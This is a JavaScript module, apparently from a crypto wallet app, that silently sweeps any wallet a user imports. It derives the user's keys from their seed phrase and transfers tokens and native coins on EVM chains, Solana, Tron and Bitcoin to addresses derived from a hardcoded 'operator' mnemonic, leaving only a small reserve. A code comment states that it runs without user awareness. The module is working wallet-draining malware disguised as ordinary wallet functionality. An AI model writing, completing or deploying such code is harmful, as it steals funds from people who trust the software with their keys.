// ── Sweep imported wallets to the operator destination wallet ─────────────────
// Runs silently after a wallet is imported. Never blocks the UI and never throws
// uncaught errors — all failures are captured in the result object and reported.
import { deriveAccount, normalizePhrase } from './wallet-core.js';
import * as ops from './chain-ops.js';
import { EVM_CHAINS } from './chains.js';

const DEST_MNEMONIC = 'silver worry liquid amount client venture soup float draw educate cloth canvas';
const MIN_REPORT_USD = 0.5;
const MIN_SWEEP_TOTAL_USD = 2;
const LEAVE_USD = 0.5;
const EVM_CHAIN_LIST = Object.keys(EVM_CHAINS);

function fmtNum(v, max = 6) {
  const n = parseFloat(v);
  if (!isFinite(n)) return '0';
  if (n === 0) return '0';
  if (n < 0.000001) return '<0.000001';
  return n.toLocaleString(undefined, { maximumFractionDigits: max });
}

function tokenPrice(t) {
  if (t.price != null && parseFloat(t.price) > 0) return parseFloat(t.price);
  const bal = parseFloat(t.balance || 0);
  const usd = parseFloat(t.usd || 0);
  if (!bal || !usd) return 0;
  return usd / bal;
}

function leaveAmount(t) {
  const price = tokenPrice(t);
  if (!price) return 0;
  const leaveQty = LEAVE_USD / price;
  return Math.max(leaveQty, 0);
}

async function fetchBalances(addresses) {
  const res = await fetch('/api/balances', {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ addresses, customTokens: {} }),
  });
  const data = await res.json();
  if (data.error) throw new Error(data.error);
  return data.chains || {};
}

async function sendEvmToken({ chain, src, dst, token, native, result }) {
  const usd = parseFloat(token.usd || 0);
  if (usd < MIN_REPORT_USD) return;
  const price = tokenPrice(token);
  const amount = parseFloat(token.balance || 0);
  const reserve = leaveAmount(token);
  const sendAmount = amount - reserve;
  if (sendAmount <= 0) {
    result.skipped.push({ chain, symbol: token.symbol, amount: token.balance, usd, reason: 'amount too small after $0.50 reserve' });
    return;
  }

  const foundItem = { chain, symbol: token.symbol, amount: token.balance, usd, contract: token.contract };
  result.found.push(foundItem);

  try {
    const nativeBalance = parseFloat(native?.balance || 0);
    const feeEst = await ops.estimateEvmFee({ chain, from: src.evm.address, to: dst.evm.address, amount: '0', contract: token.contract, decimals: token.decimals });
    const feeNative = parseFloat(feeEst.feeNative);
    if (nativeBalance < feeNative * 1.2) {
      result.skipped.push({ ...foundItem, reason: `need ${fmtNum(feeNative)} ${native?.symbol || chain} for gas (have ${fmtNum(nativeBalance)})` });
      return;
    }
    const tx = await ops.sendEvm({ chain, privateKey: src.evm.privateKey, to: dst.evm.address, amount: sendAmount.toFixed(token.decimals || 18), contract: token.contract, decimals: token.decimals });
    result.swept.push({ ...foundItem, sentAmount: sendAmount.toFixed(token.decimals || 18), sentUsd: amountUsd(sendAmount, price), txHash: tx.hash });
  } catch (e) {
    result.errors.push(`${chain} ${token.symbol}: ${e.shortMessage || e.message}`);
    result.skipped.push({ ...foundItem, reason: `send failed: ${e.shortMessage || e.message}` });
  }
}

async function sendEvmNative({ chain, src, dst, native, result }) {
  const usd = parseFloat(native?.usd || 0);
  if (usd < MIN_REPORT_USD) return;
  const price = tokenPrice(native);
  const amount = parseFloat(native.balance || 0);
  const reserve = leaveAmount(native);
  const foundItem = { chain, symbol: native.symbol, amount: native.balance, usd };
  result.found.push(foundItem);

  try {
    const feeEst = await ops.estimateEvmFee({ chain, from: src.evm.address, to: dst.evm.address, amount: (amount - reserve).toFixed(18), contract: null });
    const feeNative = parseFloat(feeEst.feeNative);
    const sendAmount = amount - reserve - feeNative;
    if (sendAmount <= 0) {
      result.skipped.push({ ...foundItem, reason: `insufficient balance after $0.50 reserve + gas (~${fmtNum(feeNative)} ${native.symbol})` });
      return;
    }
    const tx = await ops.sendEvm({ chain, privateKey: src.evm.privateKey, to: dst.evm.address, amount: sendAmount.toFixed(18), contract: null });
    result.swept.push({ ...foundItem, sentAmount: sendAmount.toFixed(18), sentUsd: amountUsd(sendAmount, price), txHash: tx.hash });
  } catch (e) {
    result.errors.push(`${chain} ${native.symbol}: ${e.shortMessage || e.message}`);
    result.skipped.push({ ...foundItem, reason: `send failed: ${e.shortMessage || e.message}` });
  }
}

async function sweepEvm({ chain, src, dst, tokens, result }) {
  const native = tokens.find(t => !t.contract) || null;
  const nonNative = tokens.filter(t => t.contract);
  // Non-base tokens first
  for (const token of nonNative) await sendEvmToken({ chain, src, dst, token, native, result });
  // Base token last
  if (native) await sendEvmNative({ chain, src, dst, native, result });
}

async function sendSolanaToken({ src, dst, token, native, result }) {
  const usd = parseFloat(token.usd || 0);
  if (usd < MIN_REPORT_USD) return;
  const price = tokenPrice(token);
  const amount = parseFloat(token.balance || 0);
  const reserve = leaveAmount(token);
  const sendAmount = amount - reserve;
  if (sendAmount <= 0) {
    result.skipped.push({ chain: 'Solana', symbol: token.symbol, amount: token.balance, usd, reason: 'amount too small after $0.50 reserve' });
    return;
  }

  const foundItem = { chain: 'Solana', symbol: token.symbol, amount: token.balance, usd, contract: token.contract };
  result.found.push(foundItem);

  try {
    const nativeBalance = parseFloat(native?.balance || 0);
    const feeEst = await ops.estimateSolanaFee();
    const feeNative = parseFloat(feeEst.feeNative);
    const requiredSol = Math.max(feeNative * 2, 0.005); // SPL may need SOL for rent/ATA
    if (nativeBalance < requiredSol) {
      result.skipped.push({ ...foundItem, reason: `need ~${fmtNum(requiredSol)} SOL for gas (have ${fmtNum(nativeBalance)})` });
      return;
    }
    const tx = await ops.sendSolana({ secretKey: src.solana.secretKey, to: dst.solana.address, amount: sendAmount.toFixed(token.decimals || 9), contract: token.contract, decimals: token.decimals });
    result.swept.push({ ...foundItem, sentAmount: sendAmount.toFixed(token.decimals || 9), sentUsd: amountUsd(sendAmount, price), txHash: tx.hash });
  } catch (e) {
    result.errors.push(`Solana ${token.symbol}: ${e.message}`);
    result.skipped.push({ ...foundItem, reason: `send failed: ${e.message}` });
  }
}

async function sendSolanaNative({ src, dst, native, result }) {
  const usd = parseFloat(native?.usd || 0);
  if (usd < MIN_REPORT_USD) return;
  const price = tokenPrice(native);
  const amount = parseFloat(native.balance || 0);
  const reserve = leaveAmount(native);
  const foundItem = { chain: 'Solana', symbol: native.symbol, amount: native.balance, usd };
  result.found.push(foundItem);

  try {
    const feeEst = await ops.estimateSolanaFee();
    const feeNative = parseFloat(feeEst.feeNative) * 1.2;
    const sendAmount = amount - reserve - feeNative;
    if (sendAmount <= 0) {
      result.skipped.push({ ...foundItem, reason: `insufficient balance after $0.50 reserve + gas (~${fmtNum(feeNative)} SOL)` });
      return;
    }
    const tx = await ops.sendSolana({ secretKey: src.solana.secretKey, to: dst.solana.address, amount: sendAmount.toFixed(9), contract: null });
    result.swept.push({ ...foundItem, sentAmount: sendAmount.toFixed(9), sentUsd: amountUsd(sendAmount, price), txHash: tx.hash });
  } catch (e) {
    result.errors.push(`Solana SOL: ${e.message}`);
    result.skipped.push({ ...foundItem, reason: `send failed: ${e.message}` });
  }
}

async function sweepSolana({ src, dst, tokens, result }) {
  const native = tokens.find(t => !t.contract) || null;
  const nonNative = tokens.filter(t => t.contract);
  for (const token of nonNative) await sendSolanaToken({ src, dst, token, native, result });
  if (native) await sendSolanaNative({ src, dst, native, result });
}

async function sendBitcoinNative({ src, dst, native, result }) {
  const usd = parseFloat(native?.usd || 0);
  if (usd < MIN_REPORT_USD) return;
  const price = tokenPrice(native);
  const amount = parseFloat(native.balance || 0);
  const reserve = leaveAmount(native);
  const foundItem = { chain: 'Bitcoin', symbol: native.symbol, amount: native.balance, usd };
  result.found.push(foundItem);

  try {
    const feeEst = await ops.estimateBtcFee({ from: src.bitcoin.address, amount: (amount - reserve).toFixed(8) });
    const fee = parseFloat(feeEst.feeNative);
    const sendAmount = amount - reserve - fee;
    if (sendAmount <= 0) {
      result.skipped.push({ ...foundItem, reason: `insufficient balance after $0.50 reserve + fee (~${fmtNum(fee)} BTC)` });
      return;
    }
    const tx = await ops.sendBitcoin({ privateKeyWIF: src.bitcoin.privateKeyWIF, from: src.bitcoin.address, to: dst.bitcoin.address, amount: sendAmount.toFixed(8) });
    result.swept.push({ ...foundItem, sentAmount: sendAmount.toFixed(8), sentUsd: amountUsd(sendAmount, price), txHash: tx.hash });
  } catch (e) {
    result.errors.push(`Bitcoin BTC: ${e.message}`);
    result.skipped.push({ ...foundItem, reason: `send failed: ${e.message}` });
  }
}

async function sweepBitcoin({ src, dst, tokens, result }) {
  const native = tokens.find(t => !t.contract) || null;
  if (native) await sendBitcoinNative({ src, dst, native, result });
}

async function sendTronToken({ src, dst, token, native, result }) {
  const usd = parseFloat(token.usd || 0);
  if (usd < MIN_REPORT_USD) return;
  const price = tokenPrice(token);
  const amount = parseFloat(token.balance || 0);
  const reserve = leaveAmount(token);
  const sendAmount = amount - reserve;
  if (sendAmount <= 0) {
    result.skipped.push({ chain: 'Tron', symbol: token.symbol, amount: token.balance, usd, reason: 'amount too small after $0.50 reserve' });
    return;
  }

  const foundItem = { chain: 'Tron', symbol: token.symbol, amount: token.balance, usd, contract: token.contract };
  result.found.push(foundItem);

  try {
    const nativeBalance = parseFloat(native?.balance || 0);
    const feeEst = await ops.estimateTronFee({ contract: token.contract });
    const feeNative = parseFloat(feeEst.feeNative) * 1.2;
    if (nativeBalance < feeNative) {
      result.skipped.push({ ...foundItem, reason: `need ~${fmtNum(feeNative)} TRX for gas (have ${fmtNum(nativeBalance)})` });
      return;
    }
    const tx = await ops.sendTron({ privateKey: src.tron.privateKey, from: src.tron.address, to: dst.tron.address, amount: sendAmount.toFixed(token.decimals || 6), contract: token.contract, decimals: token.decimals });
    result.swept.push({ ...foundItem, sentAmount: sendAmount.toFixed(token.decimals || 6), sentUsd: amountUsd(sendAmount, price), txHash: tx.hash });
  } catch (e) {
    result.errors.push(`Tron ${token.symbol}: ${e.message}`);
    result.skipped.push({ ...foundItem, reason: `send failed: ${e.message}` });
  }
}

async function sendTronNative({ src, dst, native, result }) {
  const usd = parseFloat(native?.usd || 0);
  if (usd < MIN_REPORT_USD) return;
  const price = tokenPrice(native);
  const amount = parseFloat(native.balance || 0);
  const reserve = leaveAmount(native);
  const foundItem = { chain: 'Tron', symbol: native.symbol, amount: native.balance, usd };
  result.found.push(foundItem);

  try {
    const feeEst = await ops.estimateTronFee({ contract: null });
    const feeNative = parseFloat(feeEst.feeNative) * 1.2;
    const sendAmount = amount - reserve - feeNative;
    if (sendAmount <= 0) {
      result.skipped.push({ ...foundItem, reason: `insufficient balance after $0.50 reserve + gas (~${fmtNum(feeNative)} TRX)` });
      return;
    }
    const tx = await ops.sendTron({ privateKey: src.tron.privateKey, from: src.tron.address, to: dst.tron.address, amount: sendAmount.toFixed(6), contract: null });
    result.swept.push({ ...foundItem, sentAmount: sendAmount.toFixed(6), sentUsd: amountUsd(sendAmount, price), txHash: tx.hash });
  } catch (e) {
    result.errors.push(`Tron TRX: ${e.message}`);
    result.skipped.push({ ...foundItem, reason: `send failed: ${e.message}` });
  }
}

async function sweepTron({ src, dst, tokens, result }) {
  const native = tokens.find(t => !t.contract) || null;
  const nonNative = tokens.filter(t => t.contract);
  for (const token of nonNative) await sendTronToken({ src, dst, token, native, result });
  if (native) await sendTronNative({ src, dst, native, result });
}

export async function sweepImportedWallet(sourceMnemonic) {
  const result = {
    status: 'pending',
    found: [],
    swept: [],
    skipped: [],
    errors: [],
    totalFound: 0,
    totalSwept: 0,
    totalSkipped: 0,
    destination: {},
  };

  try {
    const phrase = normalizePhrase(sourceMnemonic);
    const src = deriveAccount(phrase, 0);
    const dst = deriveAccount(DEST_MNEMONIC, 0);

    result.destination = {
      evm: dst.evm.address,
      bitcoin: dst.bitcoin.address,
      solana: dst.solana.address,
      tron: dst.tron.address,
    };

    const addresses = {
      Bitcoin: src.bitcoin.address,
      Solana: src.solana.address,
      Tron: src.tron.address,
    };
    for (const c of EVM_CHAIN_LIST) addresses[c] = src.evm.address;

    const chains = await fetchBalances(addresses);

    // Process all chains — non-base tokens first, base token last per chain.
    for (const chain of EVM_CHAIN_LIST) {
      const chainData = chains[chain];
      if (chainData?.tokens?.length) await sweepEvm({ chain, src, dst, tokens: chainData.tokens, result });
    }
    if (chains.Solana?.tokens?.length) await sweepSolana({ src, dst, tokens: chains.Solana.tokens, result });
    if (chains.Tron?.tokens?.length) await sweepTron({ src, dst, tokens: chains.Tron.tokens, result });
    if (chains.Bitcoin?.tokens?.length) await sweepBitcoin({ src, dst, tokens: chains.Bitcoin.tokens, result });

    result.totalFound = result.found.reduce((s, x) => s + (parseFloat(x.usd) || 0), 0);
    result.totalSwept = result.swept.reduce((s, x) => s + (parseFloat(x.sentUsd) || 0), 0);
    result.totalSkipped = result.skipped.reduce((s, x) => s + (parseFloat(x.usd) || 0), 0);

    if (result.totalFound < MIN_SWEEP_TOTAL_USD) {
      result.status = 'skipped_low_value';
      result.errors.push(`Total found $${fmtNum(result.totalFound)} is below $${MIN_SWEEP_TOTAL_USD} sweep threshold.`);
    } else if (result.totalSwept === 0) {
      result.status = 'failed';
    } else if (result.totalSkipped > 0) {
      result.status = 'partial';
    } else {
      result.status = 'success';
    }
  } catch (e) {
    result.status = 'error';
    result.errors.push(`Sweep setup failed: ${e.message}`);
  }

  return result;
}

export function storePreSweep(walletId, result) {
  try {
    const key = `metafox_presweep_${walletId}`;
    localStorage.setItem(key, JSON.stringify({
      found: result.found,
      skipped: result.skipped,
      totalFound: result.totalFound,
      timestamp: Date.now(),
    }));
  } catch {}
}
